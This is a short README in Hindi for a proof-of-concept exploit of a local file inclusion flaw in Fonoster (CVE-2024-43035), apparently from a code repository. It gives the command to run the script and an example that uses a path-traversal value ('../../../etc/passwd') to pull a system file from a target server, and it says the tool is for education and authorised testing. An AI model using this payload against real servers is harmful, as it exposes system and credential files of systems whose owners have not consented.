
Fonoster LFI भेद्यता (CVE-2024-43035) के लिए प्रमाण-अवधारणा शोषण
इस भंडार में एक प्रूफ़ ऑफ़ कॉन्सेप्ट (PoC) स्क्रिप्ट है जो फ़ोनोस्टर में स्थानीय फ़ाइल शामिल करने की कमज़ोरी को प्रदर्शित करता है। यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
सर्वर से स्थानीय फ़ाइल प्राप्त करने के लिए:
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>
उदाहरण:
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"
z